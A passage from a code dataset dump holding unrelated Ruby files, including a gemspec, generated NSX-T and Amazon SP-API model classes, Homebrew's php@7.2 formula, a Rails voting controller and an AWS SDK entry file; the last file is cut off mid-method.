hexsha (stringlengths, 40-40) | size (int64, 2-1.01M) | content (stringlengths, 2-1.01M) | avg_line_length (float64, 1.5-100) | max_line_length (int64, 2-1k) | alphanum_fraction (float64, 0.25-1) |
---|---|---|---|---|---|
e277effb95921a69ffb05d9365b97056cd64295d | 958 | # coding: utf-8
lib = File.expand_path('../lib', __FILE__)
$LOAD_PATH.unshift(lib) unless $LOAD_PATH.include?(lib)
require 'zklib/version'
Gem::Specification.new do |spec|
spec.name = 'zklib'
spec.version = Zklib::VERSION
spec.platform = Gem::Platform::RUBY
spec.license = 'MIT'
spec.summary = 'Attendance machine client in Ruby'
spec.email = 'anhtrantuan.hcmc@gmail.com'
spec.homepage = 'https://github.com/anhtrantuan/zklib-ruby'
spec.description = 'Attendance machine client in Ruby'
spec.authors = ['Anh Tran']
spec.files = `git ls-files -z`.split("\x0").reject { |f| f.match(%r{^(test|spec|features)/}) }
spec.require_paths = ['lib']
spec.add_dependency 'bindata', '~> 2.3'
spec.add_development_dependency 'bundler', '~> 1.12'
spec.add_development_dependency 'rake', '~> 10.0'
spec.add_development_dependency 'minitest', '~> 5.0'
spec.add_development_dependency 'byebug', '~> 9.0'
end
| 34.214286 | 104 | 0.674322 |
037d12e4d38d490440b3889dad0d0a8684585d7d | 7,753 | =begin
#NSX-T Data Center Policy API
#VMware NSX-T Data Center Policy REST API
OpenAPI spec version: 3.1.0.0.0
Generated by: https://github.com/swagger-api/swagger-codegen.git
Swagger Codegen version: 2.4.19
=end
require 'date'
module NSXTPolicy
class ConsolidatedEffectiveIPAddressMemberListResult
# Link to this resource
attr_accessor :_self
# The server will populate this field when returning the resource. Ignored on PUT and POST.
attr_accessor :_links
# Schema for this resource
attr_accessor :_schema
# Opaque cursor to be used for getting next page of records (supplied by current result page)
attr_accessor :cursor
# If true, results are sorted in ascending order
attr_accessor :sort_ascending
# Field by which records are sorted
attr_accessor :sort_by
# Count of results found (across all pages), set only on first page
attr_accessor :result_count
# Paged Collection of site wise consolidated effective ip addresses for the given NSGroup
attr_accessor :results
# Attribute mapping from ruby-style variable name to JSON key.
def self.attribute_map
{
:'_self' => :'_self',
:'_links' => :'_links',
:'_schema' => :'_schema',
:'cursor' => :'cursor',
:'sort_ascending' => :'sort_ascending',
:'sort_by' => :'sort_by',
:'result_count' => :'result_count',
:'results' => :'results'
}
end
# Attribute type mapping.
def self.swagger_types
{
:'_self' => :'SelfResourceLink',
:'_links' => :'Array<ResourceLink>',
:'_schema' => :'String',
:'cursor' => :'String',
:'sort_ascending' => :'BOOLEAN',
:'sort_by' => :'String',
:'result_count' => :'Integer',
:'results' => :'Array<EffectiveIPInfo>'
}
end
# Initializes the object
# @param [Hash] attributes Model attributes in the form of hash
def initialize(attributes = {})
return unless attributes.is_a?(Hash)
# convert string to symbol for hash key
attributes = attributes.each_with_object({}) { |(k, v), h| h[k.to_sym] = v }
if attributes.has_key?(:'_self')
self._self = attributes[:'_self']
end
if attributes.has_key?(:'_links')
if (value = attributes[:'_links']).is_a?(Array)
self._links = value
end
end
if attributes.has_key?(:'_schema')
self._schema = attributes[:'_schema']
end
if attributes.has_key?(:'cursor')
self.cursor = attributes[:'cursor']
end
if attributes.has_key?(:'sort_ascending')
self.sort_ascending = attributes[:'sort_ascending']
end
if attributes.has_key?(:'sort_by')
self.sort_by = attributes[:'sort_by']
end
if attributes.has_key?(:'result_count')
self.result_count = attributes[:'result_count']
end
if attributes.has_key?(:'results')
if (value = attributes[:'results']).is_a?(Array)
self.results = value
end
end
end
# Show invalid properties with the reasons. Usually used together with valid?
# @return Array for valid properties with the reasons
def list_invalid_properties
invalid_properties = Array.new
if @results.nil?
invalid_properties.push('invalid value for "results", results cannot be nil.')
end
invalid_properties
end
# Check to see if all the properties in the model are valid
# @return true if the model is valid
def valid?
return false if @results.nil?
true
end
# Checks equality by comparing each attribute.
# @param [Object] Object to be compared
def ==(o)
return true if self.equal?(o)
self.class == o.class &&
_self == o._self &&
_links == o._links &&
_schema == o._schema &&
cursor == o.cursor &&
sort_ascending == o.sort_ascending &&
sort_by == o.sort_by &&
result_count == o.result_count &&
results == o.results
end
# @see the `==` method
# @param [Object] Object to be compared
def eql?(o)
self == o
end
# Calculates hash code according to all attributes.
# @return [Fixnum] Hash code
def hash
[_self, _links, _schema, cursor, sort_ascending, sort_by, result_count, results].hash
end
# Builds the object from hash
# @param [Hash] attributes Model attributes in the form of hash
# @return [Object] Returns the model itself
def build_from_hash(attributes)
return nil unless attributes.is_a?(Hash)
self.class.swagger_types.each_pair do |key, type|
if type =~ /\AArray<(.*)>/i
# check to ensure the input is an array given that the attribute
# is documented as an array but the input is not
if attributes[self.class.attribute_map[key]].is_a?(Array)
self.send("#{key}=", attributes[self.class.attribute_map[key]].map { |v| _deserialize($1, v) })
end
elsif !attributes[self.class.attribute_map[key]].nil?
self.send("#{key}=", _deserialize(type, attributes[self.class.attribute_map[key]]))
end # or else data not found in attributes(hash), not an issue as the data can be optional
end
self
end
# Deserializes the data based on type
# @param string type Data type
# @param string value Value to be deserialized
# @return [Object] Deserialized data
def _deserialize(type, value)
case type.to_sym
when :DateTime
DateTime.parse(value)
when :Date
Date.parse(value)
when :String
value.to_s
when :Integer
value.to_i
when :Float
value.to_f
when :BOOLEAN
if value.to_s =~ /\A(true|t|yes|y|1)\z/i
true
else
false
end
when :Object
# generic object (usually a Hash), return directly
value
when /\AArray<(?<inner_type>.+)>\z/
inner_type = Regexp.last_match[:inner_type]
value.map { |v| _deserialize(inner_type, v) }
when /\AHash<(?<k_type>.+?), (?<v_type>.+)>\z/
k_type = Regexp.last_match[:k_type]
v_type = Regexp.last_match[:v_type]
{}.tap do |hash|
value.each do |k, v|
hash[_deserialize(k_type, k)] = _deserialize(v_type, v)
end
end
else # model
temp_model = NSXTPolicy.const_get(type).new
temp_model.build_from_hash(value)
end
end
# Returns the string representation of the object
# @return [String] String presentation of the object
def to_s
to_hash.to_s
end
# to_body is an alias to to_hash (backward compatibility)
# @return [Hash] Returns the object in the form of hash
def to_body
to_hash
end
# Returns the object in the form of hash
# @return [Hash] Returns the object in the form of hash
def to_hash
hash = {}
self.class.attribute_map.each_pair do |attr, param|
value = self.send(attr)
next if value.nil?
hash[param] = _to_hash(value)
end
hash
end
# Outputs non-array value in the form of hash
# For object, use to_hash. Otherwise, just return the value
# @param [Object] value Any valid value
# @return [Hash] Returns the value in the form of hash
def _to_hash(value)
if value.is_a?(Array)
value.compact.map { |v| _to_hash(v) }
elsif value.is_a?(Hash)
{}.tap do |hash|
value.each { |k, v| hash[k] = _to_hash(v) }
end
elsif value.respond_to? :to_hash
value.to_hash
else
value
end
end
end
end
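# --- Usage sketch (not part of the generated file) ---
# A minimal demonstration of driving this generated model by hand, guarded so it
# only runs when this file is executed directly. The response hash below is an
# illustrative placeholder, not a real policy API payload; its keys follow the
# symbol names used in attribute_map.
if __FILE__ == $0
  api_response = { cursor: '0003', result_count: 0, results: [] }
  result = NSXTPolicy::ConsolidatedEffectiveIPAddressMemberListResult.new
  result.build_from_hash(api_response)
  puts result.valid?   # => true, because `results` is present (an empty array here)
  puts result.to_s     # prints the hash form keyed by the JSON names in attribute_map
end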
| 29.256604 | 107 | 0.611376 |
1c4a6b795367df49f10dcfb2913b4b9e628de977 | 16,611 | class PhpAT72 < Formula
desc "General-purpose scripting language"
homepage "https://www.php.net/"
# Should only be updated if the new version is announced on the homepage, https://www.php.net/
url "https://www.php.net/distributions/php-7.2.27.tar.xz"
sha256 "7bd0fb9e3b63cfe53176d1f3565cd686f90b3926217158de5ba57091f49e4c32"
bottle do
sha256 "48f992816667bb5a68fa313c6fe038117a441a5e86eeafa98ec7c063777b0b3c" => :catalina
sha256 "2ab944e0812974fc02d97078953fcd33b740f0930225ccb9a855fda431477339" => :mojave
sha256 "1bf0f596a78b0ccb62e4fb9567ab24ccdf831a040974b96e5b45a175a05ce0d1" => :high_sierra
sha256 "70e35562cf2e1426d65dc48474050d7dc1c7b77eb4682d070449e6dfe5992bc8" => :x86_64_linux
end
keg_only :versioned_formula
depends_on "httpd" => [:build, :test]
depends_on "pkg-config" => :build
depends_on "apr"
depends_on "apr-util"
depends_on "argon2"
depends_on "aspell"
depends_on "autoconf"
depends_on "curl-openssl"
depends_on "freetds"
depends_on "freetype"
depends_on "gettext"
depends_on "glib"
depends_on "gmp"
depends_on "icu4c"
depends_on "jpeg"
depends_on "libpng"
depends_on "libpq"
depends_on "libsodium"
depends_on "libzip"
depends_on "openldap"
depends_on "openssl@1.1"
depends_on "sqlite"
depends_on "tidy-html5"
depends_on "unixodbc"
depends_on "webp"
unless OS.mac?
depends_on "xz" => :build
depends_on "libedit"
end
uses_from_macos "bzip2"
uses_from_macos "libxml2"
uses_from_macos "libxslt"
uses_from_macos "zlib"
# PHP build system incorrectly links system libraries
# see https://github.com/php/php-src/pull/3472
patch :DATA if OS.mac?
def install
# Ensure that libxml2 will be detected correctly on older macOS versions
if MacOS.version == :el_capitan || MacOS.version == :sierra
ENV["SDKROOT"] = MacOS.sdk_path
end
# buildconf required due to system library linking bug patch
system "./buildconf", "--force"
inreplace "configure" do |s|
s.gsub! "APACHE_THREADED_MPM=`$APXS_HTTPD -V | grep 'threaded:.*yes'`",
"APACHE_THREADED_MPM="
s.gsub! "APXS_LIBEXECDIR='$(INSTALL_ROOT)'`$APXS -q LIBEXECDIR`",
"APXS_LIBEXECDIR='$(INSTALL_ROOT)#{lib}/httpd/modules'"
s.gsub! "-z `$APXS -q SYSCONFDIR`",
"-z ''"
# apxs will interpolate the @ in the versioned prefix: https://bz.apache.org/bugzilla/show_bug.cgi?id=61944
s.gsub! "LIBEXECDIR='$APXS_LIBEXECDIR'",
"LIBEXECDIR='" + "#{lib}/httpd/modules".gsub("@", "\\@") + "'"
end
# Update error message in apache sapi to better explain the requirements
# of using Apache http in combination with php if the non-compatible MPM
# has been selected. Homebrew has chosen not to support being able to
# compile a thread safe version of PHP and therefore it is not
# possible to recompile as suggested in the original message
inreplace "sapi/apache2handler/sapi_apache2.c",
"You need to recompile PHP.",
"Homebrew PHP does not support a thread-safe php binary. "\
"To use the PHP apache sapi please change "\
"your httpd config to use the prefork MPM"
inreplace "sapi/fpm/php-fpm.conf.in", ";daemonize = yes", "daemonize = no"
# Required due to icu4c dependency
ENV.cxx11
config_path = etc/"php/#{php_version}"
# Prevent system pear config from inhibiting pear install
(config_path/"pear.conf").delete if (config_path/"pear.conf").exist?
# Prevent homebrew from hardcoding path to sed shim in phpize script
ENV["lt_cv_path_SED"] = "sed"
# Each extension that is built on Mojave needs a direct reference to the
# sdk path or it won't find the headers
if OS.mac?
headers_path = "=#{MacOS.sdk_path_if_needed}/usr"
else
headers_path = ""
end
args = %W[
--prefix=#{prefix}
--localstatedir=#{var}
--sysconfdir=#{config_path}
--with-config-file-path=#{config_path}
--with-config-file-scan-dir=#{config_path}/conf.d
--with-pear=#{pkgshare}/pear
--enable-bcmath
--enable-calendar
--enable-dba
--enable-exif
--enable-ftp
--enable-fpm
--enable-intl
--enable-mbregex
--enable-mbstring
--enable-mysqlnd
--enable-opcache-file
--enable-pcntl
--enable-phpdbg
--enable-phpdbg-webhelper
--enable-shmop
--enable-soap
--enable-sockets
--enable-sysvmsg
--enable-sysvsem
--enable-sysvshm
--enable-wddx
--enable-zip
--with-apxs2=#{Formula["httpd"].opt_bin}/apxs
--with-curl=#{Formula["curl-openssl"].opt_prefix}
--with-fpm-user=_www
--with-fpm-group=_www
--with-freetype-dir=#{Formula["freetype"].opt_prefix}
--with-gd
--with-gettext=#{Formula["gettext"].opt_prefix}
--with-gmp=#{Formula["gmp"].opt_prefix}
--with-iconv#{headers_path}
--with-icu-dir=#{Formula["icu4c"].opt_prefix}
--with-jpeg-dir=#{Formula["jpeg"].opt_prefix}
--with-kerberos#{headers_path}
--with-layout=GNU
--with-ldap=#{Formula["openldap"].opt_prefix}
--with-ldap-sasl#{headers_path}
--with-libzip
--with-mhash#{headers_path}
--with-mysql-sock=/tmp/mysql.sock
--with-mysqli=mysqlnd
--with-openssl=#{Formula["openssl@1.1"].opt_prefix}
--with-password-argon2=#{Formula["argon2"].opt_prefix}
--with-pdo-dblib=#{Formula["freetds"].opt_prefix}
--with-pdo-mysql=mysqlnd
--with-pdo-odbc=unixODBC,#{Formula["unixodbc"].opt_prefix}
--with-pdo-pgsql=#{Formula["libpq"].opt_prefix}
--with-pdo-sqlite=#{Formula["sqlite"].opt_prefix}
--with-pgsql=#{Formula["libpq"].opt_prefix}
--with-pic
--with-png-dir=#{Formula["libpng"].opt_prefix}
--with-pspell=#{Formula["aspell"].opt_prefix}
--with-sodium=#{Formula["libsodium"].opt_prefix}
--with-sqlite3=#{Formula["sqlite"].opt_prefix}
--with-tidy=#{Formula["tidy-html5"].opt_prefix}
--with-unixODBC=#{Formula["unixodbc"].opt_prefix}
--with-webp-dir=#{Formula["webp"].opt_prefix}
--with-xmlrpc
]
if OS.mac?
args << "--enable-dtrace"
args << "--with-zlib#{headers_path}"
args << "--with-bz2#{headers_path}"
args << "--with-ndbm#{headers_path}"
args << "--with-libedit#{headers_path}"
args << "--with-libxml-dir#{headers_path}"
args << "--with-xsl#{headers_path}"
else
args << "--disable-dtrace"
args << "--with-zlib=#{Formula["zlib"].opt_prefix}"
args << "--with-bz2=#{Formula["bzip2"].opt_prefix}"
args << "--with-libedit=#{Formula["libedit"].opt_prefix}"
args << "--with-libxml-dir=#{Formula["libxml2"].opt_prefix}"
args << "--with-xsl=#{Formula["libxslt"].opt_prefix}"
args << "--without-ldap-sasl"
args << "--without-ndbm"
args << "--without-gdbm"
end
system "./configure", *args
system "make"
system "make", "install"
# Allow pecl to install outside of Cellar
extension_dir = Utils.popen_read("#{bin}/php-config --extension-dir").chomp
orig_ext_dir = File.basename(extension_dir)
inreplace bin/"php-config", lib/"php", prefix/"pecl"
inreplace "php.ini-development", %r{; ?extension_dir = "\./"},
"extension_dir = \"#{HOMEBREW_PREFIX}/lib/php/pecl/#{orig_ext_dir}\""
# Use OpenSSL cert bundle
inreplace "php.ini-development", /; ?openssl\.cafile=/,
"openssl.cafile = \"#{etc}/openssl@1.1/cert.pem\""
inreplace "php.ini-development", /; ?openssl\.capath=/,
"openssl.capath = \"#{etc}/openssl@1.1/certs\""
config_files = {
"php.ini-development" => "php.ini",
"sapi/fpm/php-fpm.conf" => "php-fpm.conf",
"sapi/fpm/www.conf" => "php-fpm.d/www.conf",
}
config_files.each_value do |dst|
dst_default = config_path/"#{dst}.default"
rm dst_default if dst_default.exist?
end
config_path.install config_files
unless (var/"log/php-fpm.log").exist?
(var/"log").mkpath
touch var/"log/php-fpm.log"
end
end
def post_install
pear_prefix = pkgshare/"pear"
pear_files = %W[
#{pear_prefix}/.depdblock
#{pear_prefix}/.filemap
#{pear_prefix}/.depdb
#{pear_prefix}/.lock
]
%W[
#{pear_prefix}/.channels
#{pear_prefix}/.channels/.alias
].each do |f|
chmod 0755, f
pear_files.concat(Dir["#{f}/*"])
end
chmod 0644, pear_files
# Custom location for extensions installed via pecl
pecl_path = HOMEBREW_PREFIX/"lib/php/pecl"
ln_s pecl_path, prefix/"pecl" unless (prefix/"pecl").exist?
extension_dir = Utils.popen_read("#{bin}/php-config --extension-dir").chomp
php_basename = File.basename(extension_dir)
php_ext_dir = opt_prefix/"lib/php"/php_basename
# fix pear config to install outside cellar
pear_path = HOMEBREW_PREFIX/"share/pear@#{php_version}"
cp_r pkgshare/"pear/.", pear_path
{
"php_ini" => etc/"php/#{php_version}/php.ini",
"php_dir" => pear_path,
"doc_dir" => pear_path/"doc",
"ext_dir" => pecl_path/php_basename,
"bin_dir" => opt_bin,
"data_dir" => pear_path/"data",
"cfg_dir" => pear_path/"cfg",
"www_dir" => pear_path/"htdocs",
"man_dir" => HOMEBREW_PREFIX/"share/man",
"test_dir" => pear_path/"test",
"php_bin" => opt_bin/"php",
}.each do |key, value|
value.mkpath if /(?<!bin|man)_dir$/.match?(key)
system bin/"pear", "config-set", key, value, "system"
end
system bin/"pear", "update-channels"
%w[
opcache
].each do |e|
ext_config_path = etc/"php/#{php_version}/conf.d/ext-#{e}.ini"
extension_type = (e == "opcache") ? "zend_extension" : "extension"
if ext_config_path.exist?
inreplace ext_config_path,
/#{extension_type}=.*$/, "#{extension_type}=#{php_ext_dir}/#{e}.so"
else
ext_config_path.write <<~EOS
[#{e}]
#{extension_type}="#{php_ext_dir}/#{e}.so"
EOS
end
end
end
def caveats
<<~EOS
To enable PHP in Apache add the following to httpd.conf and restart Apache:
LoadModule php7_module #{opt_lib}/httpd/modules/libphp7.so
<FilesMatch \\.php$>
SetHandler application/x-httpd-php
</FilesMatch>
Finally, check DirectoryIndex includes index.php
DirectoryIndex index.php index.html
The php.ini and php-fpm.ini files can be found in:
#{etc}/php/#{php_version}/
EOS
end
def php_version
version.to_s.split(".")[0..1].join(".")
end
plist_options :manual => "php-fpm"
def plist; <<~EOS
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
<key>KeepAlive</key>
<true/>
<key>Label</key>
<string>#{plist_name}</string>
<key>ProgramArguments</key>
<array>
<string>#{opt_sbin}/php-fpm</string>
<string>--nodaemonize</string>
</array>
<key>RunAtLoad</key>
<true/>
<key>WorkingDirectory</key>
<string>#{var}</string>
<key>StandardErrorPath</key>
<string>#{var}/log/php-fpm.log</string>
</dict>
</plist>
EOS
end
test do
assert_match /^Zend OPcache$/, shell_output("#{bin}/php -i"),
"Zend OPCache extension not loaded"
# Test related to libxml2 and
# https://github.com/Homebrew/homebrew-core/issues/28398
if OS.mac?
assert_includes MachO::Tools.dylibs("#{bin}/php"),
"#{Formula["libpq"].opt_lib}/libpq.5.dylib"
end
system "#{sbin}/php-fpm", "-t"
system "#{bin}/phpdbg", "-V"
system "#{bin}/php-cgi", "-m"
# Prevent the SNMP extension from being added
assert_no_match /^snmp$/, shell_output("#{bin}/php -m"),
"SNMP extension doesn't work reliably with Homebrew on High Sierra"
begin
require "socket"
server = TCPServer.new(0)
port = server.addr[1]
server_fpm = TCPServer.new(0)
port_fpm = server_fpm.addr[1]
server.close
server_fpm.close
expected_output = /^Hello world!$/
(testpath/"index.php").write <<~EOS
<?php
echo 'Hello world!' . PHP_EOL;
var_dump(ldap_connect());
EOS
main_config = <<~EOS
Listen #{port}
ServerName localhost:#{port}
DocumentRoot "#{testpath}"
ErrorLog "#{testpath}/httpd-error.log"
ServerRoot "#{Formula["httpd"].opt_prefix}"
PidFile "#{testpath}/httpd.pid"
LoadModule authz_core_module lib/httpd/modules/mod_authz_core.so
LoadModule unixd_module lib/httpd/modules/mod_unixd.so
LoadModule dir_module lib/httpd/modules/mod_dir.so
DirectoryIndex index.php
EOS
(testpath/"httpd.conf").write <<~EOS
#{main_config}
LoadModule mpm_prefork_module lib/httpd/modules/mod_mpm_prefork.so
LoadModule php7_module #{lib}/httpd/modules/libphp7.so
<FilesMatch \\.(php|phar)$>
SetHandler application/x-httpd-php
</FilesMatch>
EOS
(testpath/"fpm.conf").write <<~EOS
[global]
daemonize=no
[www]
listen = 127.0.0.1:#{port_fpm}
pm = dynamic
pm.max_children = 5
pm.start_servers = 2
pm.min_spare_servers = 1
pm.max_spare_servers = 3
EOS
(testpath/"httpd-fpm.conf").write <<~EOS
#{main_config}
LoadModule mpm_event_module lib/httpd/modules/mod_mpm_event.so
LoadModule proxy_module lib/httpd/modules/mod_proxy.so
LoadModule proxy_fcgi_module lib/httpd/modules/mod_proxy_fcgi.so
<FilesMatch \\.(php|phar)$>
SetHandler "proxy:fcgi://127.0.0.1:#{port_fpm}"
</FilesMatch>
EOS
pid = fork do
exec Formula["httpd"].opt_bin/"httpd", "-X", "-f", "#{testpath}/httpd.conf"
end
sleep 3
assert_match expected_output, shell_output("curl -s 127.0.0.1:#{port}")
Process.kill("TERM", pid)
Process.wait(pid)
fpm_pid = fork do
exec sbin/"php-fpm", "-y", "fpm.conf"
end
pid = fork do
exec Formula["httpd"].opt_bin/"httpd", "-X", "-f", "#{testpath}/httpd-fpm.conf"
end
sleep 3
assert_match expected_output, shell_output("curl -s 127.0.0.1:#{port}")
ensure
if pid
Process.kill("TERM", pid)
Process.wait(pid)
end
if fpm_pid
Process.kill("TERM", fpm_pid)
Process.wait(fpm_pid)
end
end
end
end
__END__
diff --git a/acinclude.m4 b/acinclude.m4
index 168c465f8d..6c087d152f 100644
--- a/acinclude.m4
+++ b/acinclude.m4
@@ -441,7 +441,11 @@ dnl
dnl Adds a path to linkpath/runpath (LDFLAGS)
dnl
AC_DEFUN([PHP_ADD_LIBPATH],[
- if test "$1" != "/usr/$PHP_LIBDIR" && test "$1" != "/usr/lib"; then
+ case "$1" in
+ "/usr/$PHP_LIBDIR"|"/usr/lib"[)] ;;
+ /Library/Developer/CommandLineTools/SDKs/*/usr/lib[)] ;;
+ /Applications/Xcode*.app/Contents/Developer/Platforms/MacOSX.platform/Developer/SDKs/*/usr/lib[)] ;;
+ *[)]
PHP_EXPAND_PATH($1, ai_p)
ifelse([$2],,[
_PHP_ADD_LIBPATH_GLOBAL([$ai_p])
@@ -452,8 +456,8 @@ AC_DEFUN([PHP_ADD_LIBPATH],[
else
_PHP_ADD_LIBPATH_GLOBAL([$ai_p])
fi
- ])
- fi
+ ]) ;;
+ esac
])
dnl
@@ -487,7 +491,11 @@ dnl add an include path.
dnl if before is 1, add in the beginning of INCLUDES.
dnl
AC_DEFUN([PHP_ADD_INCLUDE],[
- if test "$1" != "/usr/include"; then
+ case "$1" in
+ "/usr/include"[)] ;;
+ /Library/Developer/CommandLineTools/SDKs/*/usr/include[)] ;;
+ /Applications/Xcode*.app/Contents/Developer/Platforms/MacOSX.platform/Developer/SDKs/*/usr/include[)] ;;
+ *[)]
PHP_EXPAND_PATH($1, ai_p)
PHP_RUN_ONCE(INCLUDEPATH, $ai_p, [
if test "$2"; then
@@ -495,8 +503,8 @@ AC_DEFUN([PHP_ADD_INCLUDE],[
else
INCLUDES="$INCLUDES -I$ai_p"
fi
- ])
- fi
+ ]) ;;
+ esac
])
dnl internal, don't use
@@ -2411,7 +2419,8 @@ AC_DEFUN([PHP_SETUP_ICONV], [
fi
if test -f $ICONV_DIR/$PHP_LIBDIR/lib$iconv_lib_name.a ||
- test -f $ICONV_DIR/$PHP_LIBDIR/lib$iconv_lib_name.$SHLIB_SUFFIX_NAME
+ test -f $ICONV_DIR/$PHP_LIBDIR/lib$iconv_lib_name.$SHLIB_SUFFIX_NAME ||
+ test -f $ICONV_DIR/$PHP_LIBDIR/lib$iconv_lib_name.tbd
then
PHP_CHECK_LIBRARY($iconv_lib_name, libiconv, [
found_iconv=yes
| 32.380117 | 113 | 0.622479 |
338599393909bbf7d3a364da68ad5eebbf8d617b | 624 | module LikeDislike
class VotesController < ActionController::Base
before_action :find_likeable
before_action :authenticate_user!
respond_to :js
def create
@likeable.liked_by current_user
render json: render_votes
end
def destroy
@likeable.disliked_by current_user
render json: render_votes
end
private
def render_votes
[@likeable.cached_votes_up, @likeable.cached_votes_down]
end
def find_likeable
@likeable_type = params[:likeable_type].classify
@likeable = @likeable_type.constantize.find(params[:likeable_id])
end
end
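# Example wiring (illustrative only; the mount path, engine constant and likeable
# class below are assumptions based on the params read in #find_likeable, not
# taken from this gem's own files):
#
#   # config/routes.rb of the host application
#   mount LikeDislike::Engine => '/like_dislike'
#
#   # An AJAX POST such as
#   #   POST /like_dislike/votes?likeable_type=post&likeable_id=42
#   # constantizes "post".classify => Post, records the vote for current_user,
#   # and responds with [cached_votes_up, cached_votes_down] as JSON.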
end | 21.517241 | 71 | 0.711538 |
0342cd01f4a33fe734c0346c797ccb2fde696d35 | 267 | module Bootstrap2Helpers
module Bootstrap
module Rails
require 'bootstrap_2_helpers/bootstrap/rails/engine' if defined?(Rails)
end
end
end
require 'bootstrap_2_helpers/version'
require 'bootstrap_2_helpers/bootstrap/rails/engine' if defined?(Rails)
| 26.7 | 77 | 0.790262 |
ff1127f40527bc3540cc887fd420752f66fa80ec | 1,331 | # frozen_string_literal: true
# WARNING ABOUT GENERATED CODE
#
# This file is generated. See the contributing guide for more information:
# https://github.com/aws/aws-sdk-ruby/blob/version-3/CONTRIBUTING.md
#
# WARNING ABOUT GENERATED CODE
require 'aws-sdk-core'
require 'aws-sigv4'
require_relative 'aws-sdk-sms/types'
require_relative 'aws-sdk-sms/client_api'
require_relative 'aws-sdk-sms/client'
require_relative 'aws-sdk-sms/errors'
require_relative 'aws-sdk-sms/resource'
require_relative 'aws-sdk-sms/customizations'
# This module provides support for AWS Server Migration Service. This module is available in the
# `aws-sdk-sms` gem.
#
# # Client
#
# The {Client} class provides one method for each API operation. Operation
# methods each accept a hash of request parameters and return a response
# structure.
#
# sms = Aws::SMS::Client.new
# resp = sms.create_app(params)
#
# See {Client} for more information.
#
# # Errors
#
# Errors returned from AWS Server Migration Service are defined in the
# {Errors} module and all extend {Errors::ServiceError}.
#
# begin
# # do stuff
# rescue Aws::SMS::Errors::ServiceError
# # rescues all AWS Server Migration Service API errors
# end
#
# See {Errors} for more information.
#
# @!group service
module Aws::SMS
GEM_VERSION = '1.37.0'
end
| 24.648148 | 96 | 0.732532 |
ff3b8f2ba9bed63fefbc73ec5623e131e2fb127d | 183 | class CreateContacts < ActiveRecord::Migration[5.2]
def change
create_table :contacts do |t|
t.timestamps
t.text :name
t.text :phone_number
end
end
end
| 16.636364 | 51 | 0.655738 |
1143549338174dcddbf503e6e8c2b48a00e8ed13 | 6,659 | =begin
#Selling Partner API for Direct Fulfillment Shipping
#The Selling Partner API for Direct Fulfillment Shipping provides programmatic access to a direct fulfillment vendor's shipping data.
OpenAPI spec version: v1
Generated by: https://github.com/swagger-api/swagger-codegen.git
Swagger Codegen version: 3.0.33
=end
require 'date'
module AmzSpApi::VendorDirectFulfillmentShippingV1
class SubmitShipmentConfirmationsRequest
attr_accessor :shipment_confirmations
# Attribute mapping from ruby-style variable name to JSON key.
def self.attribute_map
{
:'shipment_confirmations' => :'shipmentConfirmations'
}
end
# Attribute type mapping.
def self.openapi_types
{
:'shipment_confirmations' => :'Object'
}
end
# List of attributes with nullable: true
def self.openapi_nullable
Set.new([
])
end
# Initializes the object
# @param [Hash] attributes Model attributes in the form of hash
def initialize(attributes = {})
if (!attributes.is_a?(Hash))
fail ArgumentError, "The input argument (attributes) must be a hash in `AmzSpApi::VendorDirectFulfillmentShippingV1::SubmitShipmentConfirmationsRequest` initialize method"
end
# check to see if the attribute exists and convert string to symbol for hash key
attributes = attributes.each_with_object({}) { |(k, v), h|
if (!self.class.attribute_map.key?(k.to_sym))
fail ArgumentError, "`#{k}` is not a valid attribute in `AmzSpApi::VendorDirectFulfillmentShippingV1::SubmitShipmentConfirmationsRequest`. Please check the name to make sure it's valid. List of attributes: " + self.class.attribute_map.keys.inspect
end
h[k.to_sym] = v
}
if attributes.key?(:'shipment_confirmations')
if (value = attributes[:'shipment_confirmations']).is_a?(Array)
self.shipment_confirmations = value
end
end
end
# Show invalid properties with the reasons. Usually used together with valid?
# @return Array for valid properties with the reasons
def list_invalid_properties
invalid_properties = Array.new
invalid_properties
end
# Check to see if all the properties in the model are valid
# @return true if the model is valid
def valid?
true
end
# Checks equality by comparing each attribute.
# @param [Object] Object to be compared
def ==(o)
return true if self.equal?(o)
self.class == o.class &&
shipment_confirmations == o.shipment_confirmations
end
# @see the `==` method
# @param [Object] Object to be compared
def eql?(o)
self == o
end
# Calculates hash code according to all attributes.
# @return [Integer] Hash code
def hash
[shipment_confirmations].hash
end
# Builds the object from hash
# @param [Hash] attributes Model attributes in the form of hash
# @return [Object] Returns the model itself
def self.build_from_hash(attributes)
new.build_from_hash(attributes)
end
# Builds the object from hash
# @param [Hash] attributes Model attributes in the form of hash
# @return [Object] Returns the model itself
def build_from_hash(attributes)
return nil unless attributes.is_a?(Hash)
self.class.openapi_types.each_pair do |key, type|
if type =~ /\AArray<(.*)>/i
# check to ensure the input is an array given that the attribute
# is documented as an array but the input is not
if attributes[self.class.attribute_map[key]].is_a?(Array)
self.send("#{key}=", attributes[self.class.attribute_map[key]].map { |v| _deserialize($1, v) })
end
elsif !attributes[self.class.attribute_map[key]].nil?
self.send("#{key}=", _deserialize(type, attributes[self.class.attribute_map[key]]))
elsif attributes[self.class.attribute_map[key]].nil? && self.class.openapi_nullable.include?(key)
self.send("#{key}=", nil)
end
end
self
end
# Deserializes the data based on type
# @param string type Data type
# @param string value Value to be deserialized
# @return [Object] Deserialized data
def _deserialize(type, value)
case type.to_sym
when :DateTime
DateTime.parse(value)
when :Date
Date.parse(value)
when :String
value.to_s
when :Integer
value.to_i
when :Float
value.to_f
when :Boolean
if value.to_s =~ /\A(true|t|yes|y|1)\z/i
true
else
false
end
when :Object
# generic object (usually a Hash), return directly
value
when /\AArray<(?<inner_type>.+)>\z/
inner_type = Regexp.last_match[:inner_type]
value.map { |v| _deserialize(inner_type, v) }
when /\AHash<(?<k_type>.+?), (?<v_type>.+)>\z/
k_type = Regexp.last_match[:k_type]
v_type = Regexp.last_match[:v_type]
{}.tap do |hash|
value.each do |k, v|
hash[_deserialize(k_type, k)] = _deserialize(v_type, v)
end
end
else # model
AmzSpApi::VendorDirectFulfillmentShippingV1.const_get(type).build_from_hash(value)
end
end
# Returns the string representation of the object
# @return [String] String presentation of the object
def to_s
to_hash.to_s
end
# to_body is an alias to to_hash (backward compatibility)
# @return [Hash] Returns the object in the form of hash
def to_body
to_hash
end
# Returns the object in the form of hash
# @return [Hash] Returns the object in the form of hash
def to_hash
hash = {}
self.class.attribute_map.each_pair do |attr, param|
value = self.send(attr)
if value.nil?
